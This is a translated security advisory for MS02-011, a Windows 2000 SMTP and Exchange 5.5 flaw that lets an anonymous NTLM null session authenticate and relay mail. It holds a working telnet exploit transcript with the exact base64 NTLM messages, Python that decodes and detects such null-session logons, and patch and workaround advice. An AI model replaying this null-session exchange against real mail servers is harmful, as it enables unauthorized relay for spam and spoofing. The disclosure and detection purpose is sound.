Microsoft Windows SMTP Service Authentication Bypass Vulnerability (MS02-011)

Published: 2002-02-27
Updated: 2002-03-04

Affected systems:
Microsoft Exchange Server 5.5
    - Microsoft Windows NT 4.0 SP6a
    - Microsoft Windows NT 4.0 SP6
    - Microsoft Windows NT 4.0 SP5
    - Microsoft Windows NT 4.0 SP4
    - Microsoft Windows NT 4.0 SP3
    - Microsoft Windows NT 4.0 SP2
    - Microsoft Windows NT 4.0 SP1
    - Microsoft Windows NT 4.0
    - Microsoft Windows BackOffice 4.5
    - Microsoft Windows 2000 SP3
    - Microsoft Windows 2000 Server SP2
    - Microsoft Windows 2000 Server SP1
Microsoft Exchange Server 5.5SP1
    - Microsoft Windows NT 4.0 SP6a
    - Microsoft Windows NT 4.0 SP6
    - Microsoft Windows NT 4.0 SP5
    - Microsoft Windows NT 4.0 SP4
    - Microsoft Windows NT 4.0 SP3
    - Microsoft Windows NT 4.0 SP2
    - Microsoft Windows NT 4.0 SP1
    - Microsoft Windows NT 4.0
    - Microsoft Windows BackOffice 4.5
    - Microsoft Windows 2000 SP3
    - Microsoft Windows 2000 Server SP2
    - Microsoft Windows 2000 Server SP1
Microsoft Exchange Server 5.5SP2
    - Microsoft Windows NT 4.0 SP6a
    - Microsoft Windows NT 4.0 SP6
    - Microsoft Windows NT 4.0 SP5
    - Microsoft Windows NT 4.0 SP4
    - Microsoft Windows NT 4.0 SP3
    - Microsoft Windows NT 4.0 SP2
    - Microsoft Windows NT 4.0 SP1
    - Microsoft Windows NT 4.0
    - Microsoft Windows BackOffice 4.5
    - Microsoft Windows 2000 SP3
    - Microsoft Windows 2000 Server SP2
    - Microsoft Windows 2000 Server SP1
Microsoft Exchange Server 5.5SP3
    - Microsoft Windows NT 4.0 SP6a
    - Microsoft Windows NT 4.0 SP6
    - Microsoft Windows NT 4.0 SP5
    - Microsoft Windows NT 4.0 SP4
    - Microsoft Windows NT 4.0 SP3
    - Microsoft Windows NT 4.0 SP2
    - Microsoft Windows NT 4.0 SP1
    - Microsoft Windows NT 4.0
    - Microsoft Windows BackOffice 4.5
    - Microsoft Windows 2000 SP3
    - Microsoft Windows 2000 Server SP2
    - Microsoft Windows 2000 Server SP1
Microsoft Exchange Server 5.5SP4
    - Microsoft Windows NT 4.0 SP6a
    - Microsoft Windows NT 4.0 SP6
    - Microsoft Windows NT 4.0 SP5
    - Microsoft Windows NT 4.0 SP4
    - Microsoft Windows NT 4.0 SP3
    - Microsoft Windows NT 4.0 SP2
    - Microsoft Windows NT 4.0 SP1
    - Microsoft Windows NT 4.0
    - Microsoft Windows BackOffice 4.5
    - Microsoft Windows 2000 SP3
    - Microsoft Windows 2000 Server SP2
    - Microsoft Windows 2000 Server SP1
Microsoft Windows 2000 SMTP Service
    - Microsoft Windows 2000 SP3
    - Microsoft Windows 2000 Server SP2
    - Microsoft Windows 2000 Server SP1
Description:
BUGTRAQ  ID: 4205
CVE(CAN) ID: CVE-2002-0054

The IIS server shipped with Windows includes an SMTP server component.

The Windows 2000 SMTP Service and the Exchange Server 5.5 Internet Mail Connector service have a flaw in how they implement authentication for sending mail, which can allow an attacker on the local network to gain unauthorized user-level access to the host.

The IIS SMTP component supports the SMTP AUTH command, including an NTLM authentication option whose purpose is to let users authenticate themselves with NTLM. However, NTLM supports null sessions, so an anonymous user can "authenticate" this way; once that authentication completes, the user is permitted to relay mail. Exchange 2000 has been confirmed not to be affected by this vulnerability.

<*Links:http://archives.neohapsis.com/archives/bugtraq/2002-02/0372.html
        http://www.microsoft.com/technet/security/bulletin/MS02-011.asp
*>

Test method:

Warning

The following program (method) may be offensive in nature and is provided for security research and teaching purposes only. Use at your own risk!

Todd Sabin (tsabin@razor.bindview.com) provided the following test method:

% telnet 192.168.8.129 25
Trying 192.168.8.129...
Connected to 192.168.8.129.
Escape character is '^]'.
220 w2ks.w2kvm.qnz.org Microsoft ESMTP MAIL Service, Version: 5.0.2172.1 ready at  Wed, 29 Aug 2001 11:52:15 -0400
HELO foo
250 w2ks.w2kvm.qnz.org Hello [192.168.8.1]
MAIL From:<>
250 2.1.0 <>....Sender OK
RCPT To:
550 5.7.1 Unable to relay for secure@microsoft.com
AUTH NTLM TlRMTVNTUAABAAAAB4IAgAAAAAAAAAAAAAAAAAAAAAA=
334 TlRMTVNTUAACAAAACgAKADAAAAAFgoGAXAsmsHmPZoAAAAAAAAAAAGQAZAA6AAAAVwAyAEsAVgBNAAIACgBXADIASwBWAE0AAQAIAFcAMgBLAFMABAAaAHcAMgBrAHYAbQAuAHEAbgB6AC4AbwByAGcAAwAkAHcAMgBrAHMALgB3ADIAawB2AG0ALgBxAG4AegAuAG8AcgBnAAAAAAA=
TlRMTVNTUAADAAAAAQABAEAAAAAAAAAAQQAAAAAAAABAAAAAAAAAAEAAAAAAAAAAQAAAAAAAAABBAAAABYIAAAA=
235 2.7.0 Authentication successfull
MAIL From:<>
503 5.5.2 Sender already specified
RCPT To:
250 2.1.5 secure@microsoft.com
DATA
354 Start mail input; end with .
Subject: your SMTP server supports null sessions

yada yada yada

.
250 2.6.0  Queued mail for delivery
QUIT
221 2.0.0 w2ks.w2kvm.qnz.org Service closing transmission channel
Connection closed by foreign host.
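As an added example (not part of the NSFOCUS advisory or of Todd Sabin's test), the Python below decodes the NTLMSSP Type 3 (AUTHENTICATE) message sent in the transcript above and shows why the server should have refused it: the domain, user name and NT response buffers are all empty and the LM response is a single zero byte, which is exactly a null session. For comparison it assembles a normal-looking Type 3 from constructed values (no real NTLM hashing is done), and it scans a transcript excerpt for null-session logons that the server answered with a 235 success. The functions `parse_ntlm_type3`, `is_null_session`, `build_type3` and `find_accepted_null_sessions`, and the shortened challenge line in the excerpt, are this example's own assumptions.

```python
import base64
import struct

# The NTLMSSP AUTHENTICATE (Type 3) message the client sent in the advisory's
# telnet transcript (copied from the page, not constructed).
TYPE3_FROM_ADVISORY = (
    "TlRMTVNTUAADAAAAAQABAEAAAAAAAAAAQQAAAAAAAABAAAAAAAAAAEAAAAAAAAAAQAAAAAAAAABBAAAABYIAAAA="
)

# Security buffers of a Type 3 message in wire order: six 8-byte descriptors
# (len:uint16, maxlen:uint16, offset:uint32, little-endian) starting at byte 12,
# followed by the 4-byte negotiate flags at byte 60.
FIELDS = ("lm_response", "nt_response", "domain", "user", "workstation", "session_key")
SIGNATURE = b"NTLMSSP\x00"


def parse_ntlm_type3(b64: str) -> dict:
    """Decode a base64 NTLMSSP Type 3 message into its buffer contents (bytes) and flags."""
    msg = base64.b64decode(b64)
    if msg[:8] != SIGNATURE or struct.unpack_from("<I", msg, 8)[0] != 3:
        raise ValueError("not an NTLMSSP AUTHENTICATE (Type 3) message")
    fields = {}
    for i, name in enumerate(FIELDS):
        length, _maxlen, offset = struct.unpack_from("<HHI", msg, 12 + 8 * i)
        if offset + length > len(msg):
            raise ValueError(f"{name} buffer points outside the message")
        fields[name] = msg[offset:offset + length]
    fields["flags"] = struct.unpack_from("<I", msg, 60)[0]
    return fields


def is_null_session(fields: dict) -> bool:
    """A null-session logon carries no user name and no NT response; the LM
    response is absent or a single zero byte. Such a message proves nothing
    about the client, so a mail server must not grant relay rights on it."""
    return (fields["user"] == b""
            and fields["nt_response"] == b""
            and fields["lm_response"] in (b"", b"\x00"))


def build_type3(domain: str, user: str, workstation: str,
                lm_response: bytes, nt_response: bytes, flags: int = 0x8205) -> str:
    """Assemble a Type 3 message for comparison (constructed example: the
    response bytes are whatever the caller passes; no NTLM hashing is done).
    The default flags value is the one decoded from the advisory's message."""
    items = [lm_response, nt_response, domain.encode("utf-16-le"),
             user.encode("utf-16-le"), workstation.encode("utf-16-le"), b""]
    header = SIGNATURE + struct.pack("<I", 3)
    buffers, payload, offset = b"", b"", 64  # 12-byte header + 6*8 descriptors + 4 flags
    for item in items:
        buffers += struct.pack("<HHI", len(item), len(item), offset)
        payload += item
        offset += len(item)
    return base64.b64encode(header + buffers + struct.pack("<I", flags) + payload).decode()


def find_accepted_null_sessions(transcript: str) -> list:
    """Scan an SMTP session transcript and return the 1-based line numbers of
    Type 3 messages that were null sessions AND were answered with a 235 reply."""
    lines = transcript.splitlines()
    hits = []
    for i, line in enumerate(lines):
        if not line.strip().startswith("TlRMTVNTUAAD"):  # base64 of SIGNATURE + type 3
            continue
        fields = parse_ntlm_type3(line.strip())
        accepted = i + 1 < len(lines) and lines[i + 1].startswith("235 ")
        if is_null_session(fields) and accepted:
            hits.append(i + 1)
    return hits


# Constructed excerpt of the advisory's session: the server challenge line is
# replaced by a placeholder, the other lines are as they appear on the page.
TRANSCRIPT_EXCERPT = "\n".join([
    "AUTH NTLM TlRMTVNTUAABAAAAB4IAgAAAAAAAAAAAAAAAAAAAAAA=",
    "334 <server CHALLENGE message omitted in this excerpt>",
    TYPE3_FROM_ADVISORY,
    "235 2.7.0 Authentication successfull",
])

if __name__ == "__main__":
    decoded = parse_ntlm_type3(TYPE3_FROM_ADVISORY)
    for name, value in decoded.items():
        print(f"{name:12} {value!r}")
    print("null session:", is_null_session(decoded))
    print("accepted null-session logons at lines:",
          find_accepted_null_sessions(TRANSCRIPT_EXCERPT))
```

The same descriptor walk works on Type 3 messages captured from any NTLM-over-SMTP exchange, so the scanner can be pointed at protocol logs to confirm whether a server still grants 235 to an empty credential after patching.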

Recommendations:
Workaround:

If you cannot install the patch or upgrade immediately, NSFOCUS recommends the following measures to reduce the threat:

* If you do not need to provide SMTP service, disable the service.

* Apply access control to the SMTP service port and make sure that only legitimate users can reach it.

Vendor patch:

Microsoft
---------
Microsoft has released a security bulletin (MS02-011) and the corresponding patch for this issue:
MS02-011:Authentication Flaw Could Allow Unauthorized Users To Authenticate To SMTP Service
Link:http://www.microsoft.com/technet/security/bulletin/MS02-011.asp

Patch download:

Microsoft Windows 2000 Server, Professional and Advanced Server:
http://www.microsoft.com/Downloads/Release.asp?ReleaseID=_36556

Exchange Server 5.5:
http://www.microsoft.com/Downloads/Release.asp?ReleaseID=33423

This vulnerability advisory was translated and compiled by NSFOCUS. All rights reserved; reproduction without permission is prohibited.